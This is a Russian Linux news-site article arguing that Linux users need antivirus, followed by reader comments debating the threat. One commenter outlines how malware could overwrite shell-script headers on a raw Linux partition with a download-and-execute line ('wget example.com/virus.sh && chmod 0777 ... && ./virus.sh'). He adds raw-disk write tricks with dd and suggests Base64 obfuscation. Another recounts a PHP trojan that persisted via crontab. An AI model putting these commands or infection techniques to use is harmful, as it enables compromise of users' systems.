Зачем линуксоиду антивирус?

Многие наивно полагают, что Linux настолько безопасен, что вирусы в нем попросту не выживают, поэтому и антивирус устанавливать незачем. Однако, можно назвать минимум 4 причины антивирус всё же установить.

Антивирус для Linux

Зачем в Linux Антивирус?

  1. Да, работающих вирусов и троянов для Linux не так много, как для Windows. И способность вирусов распространяться в Linux-системах весьма ограничена. Но уничтожить содержимое домашней директории пользователя вирусу вполне по силам. Следовательно, дополнительная защита будет весьма кстати.
  2. Хотя установка программ из репозиториев значительно снижает риск подхватить заразу, остаются другие пути заражения. Например, вы можете принести троян на флешке, которую ранее подключали к компьютеру в общественном месте.
  3. Если у вас установлена второй системой ОС Windows, тамошние вирусы могут получить доступ к Linux-разделу и инжектировать свой вредоносный код в пользовательские и даже системные файлы.
  4. Если у вас на компьютере запущены сервисы вроде Samba, вирусы легко могут проникнуть на диск естественным путем и дожидаться, когда вы их из любопытства запустите. В общем, и тут антивирус не помешает.

Статья является адаптированным переводом креатива «Why would I use Antivirus in a Linux system»? Мнение редакции Либератума может не совпадать (и не совпадает) с точкой зрения автора оригинальной статьи. В частности, редакция полным составом уверена в том, что правильное выстраивание политики безопасности дает намного более серьезный результат, чем использование антивирусов, эффективность которых вызывает сомнение.

Ваша оценка: Нет Средняя оценка: 5 (2 votes)
8
Platon

rkhunter и chkrootkit — для мониторинга внутренних угроз
clamtk — для проверки внешних носителей (флешек)
остальные функции успешно выполняет сетевой экран iptables
проактивные АВ в Linux - 5-ое колясо

Ваша оценка: Нет Средняя оценка: 4 (1 vote)
4

Если у вас установлена второй системой ОС Windows, тамошние вирусы могут получить доступ к Linux-разделу и инжектировать свой вредоносный код в пользовательские и даже системные файлы.

Теоретически конечно да, практически — это какая-то фантастика. Это вирус должен получается как минимум иметь с своём теле драйвера для всех (ну или как минимум наиболее популярных) файловых систем. Плюс уметь инжектироваться в elf.

И способность вирусов распространяться в Linux-системах весьма ограничена.

Это кстати больше из раздела мифов. Нормально они распространяются. В особенности трояны. Правда и найти их существенно легче т.к. мест куда троян может сохраниться не так много.

Но уничтожить содержимое домашней директории пользователя вирусу вполне по силам.

Это как-то больше на страшилку похоже.

В общем в целом согласен с мнением редакции.

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
6

а можно показать хоть один реальный троян для дистрибутива Linux, честно хочу увидить в реальности!?
А то все только, как концепты и только...типа возможно и будет или можно подцепить и чего-то там заразить?:)

Ваша оценка: Нет Средняя оценка: 5 (1 vote)
4

Сталкивался лично. Код к сожалению не сохранил — но помню путь каким он попадал в систему. На сервере работал wordpress — соответственно установлен LAMP. Сам троян появлялся в папке /tmp — там появлялись исходники. Команда на компиляцию прописывалась в кронтаб. Как-то так — давно было дело. Собственно сам по себе троян был просто запускалкой php. Такой типа мини сервер — просто слушал и ждал команды. Т.е. локальный доступ в систему с правами вебсервера у него типа уже был. Дальше уже использовались локальные уязвимости.

Ваша оценка: Нет
4

Да — вспомнил ещё — когда права привели в порядок и у него не стало возможности записываться на диск я помню последний раз поймал его (ну в смысле исходный код) в одном из подкаталогов /dev/, что просто вынесло мне мозг. Скомпилироваться он уже не мог, а вот тело всё равно ухитрялся записать. PHP стоял без секьюрити патчей т.е. при их установке резко падала производительность и хозяин сервера был крайне недоволен.

Ваша оценка: Нет
4

А то все только, как концепты и только

Да и вот кстати легко гуглится http://habrahabr.ru/post/248933/.
Используется кстати трюк с кронтабом который я описал в другой ветке.

Ваша оценка: Нет
11
pomodor

это какая-то фантастика. Это вирус должен получается как минимум иметь с своём теле драйвера для всех

Нихрена подобного! Вирус может читать сырые данные, искать в потоке сигнатуры (например, #!/bin/bash) и прописывать за ней команду на загрузку своего кода (например, wget example.com/virus.sh && chmod 0777 virus.sh && ./virus.sh). Для этого драйвер не нужен. И когда линуксоид загрузится в Linux, инфицирование практически гарантировано.

Единственное, что немного сдерживает такую угрозу — необходимость получить низкоуровневой доступ к диску. Но какой виндузятник не тыкает по инерции на кнопку Yes, когда у него Вантуз чем-нибудь на тему безопасности интересуется?!

Ваша оценка: Нет
4

Вирус может читать сырые данные, искать в потоке сигнатуры (например, #!/bin/bash)

Мммда — кстати любопытно

Ваша оценка: Нет
11
pomodor

Ничего любопытного. :) А из Linux можно легко читать данные на Windows-разделах, искать в них подстроки, дописывать свои данные. И без всяких драйверов, только с помощью dd и cat. Создайте в Вантузе текстовой файл, поместите в него какую-нибудь уникальную строку (например, сумму MD5), а потом найдите ее в Linux, даже не монтируя Windows-раздел:

cat /dev/sda1 | grep подстрока

Ну а дописать свой код можно с помощью dd и опции offset.

Драйвер понадобится только для зашифрованных файловых систем.

Ваша оценка: Нет
4

Но как я понимаю есть риск превысить размер блока на файловой системе. Тогда при загрузке файл будет испорчен. Правда его надо ещё превысить. В принципе подсадить заразу вполне хватит.

Ваша оценка: Нет
11
pomodor

Файл не будет испорчен. Просто ОС не увидит данные за границами, указанными в таблице размещения файлов. Да и риск выйти за границы существует только тогда, когда дописывать что-то предполагается в конец файла, тогда как в моем примере предлагается переписывать данные сразу за #!/bin/sh, то есть в начало.

Ваша оценка: Нет
4

Ну я имею в виду если размер кода будет больше чем размер блока, то он будет нерабочий — испорченный. Но ситуация конечно маловероятная.

Ваша оценка: Нет
11
pomodor

Нет никакого смысла помещать вредоносный код целиком. Достаточно вставить короткую строку загрузки трояна из интернета. Да еще в Base64 зашифрованную, чтобы большинство убунтоидов ничего не заподозрило.

Ваша оценка: Нет
Отправить комментарий
КАПЧА
Вы человек? Подсказка: зарегистрируйтесь, чтобы этот вопрос больше никогда не возникал. Кстати, анонимные ссылки запрещены.
CAPTCHA на основе изображений
Enter the characters shown in the image.
Linux I класса
Linux II класса
Linux III класса
Счетчики
  • Самый популярный сайт о Linux и Windows 10
О Либератуме

Liberatum — это новости мира дистрибутивов Linux, обзоры, сборки, блоги, а также лучший сайт об Ubuntu*.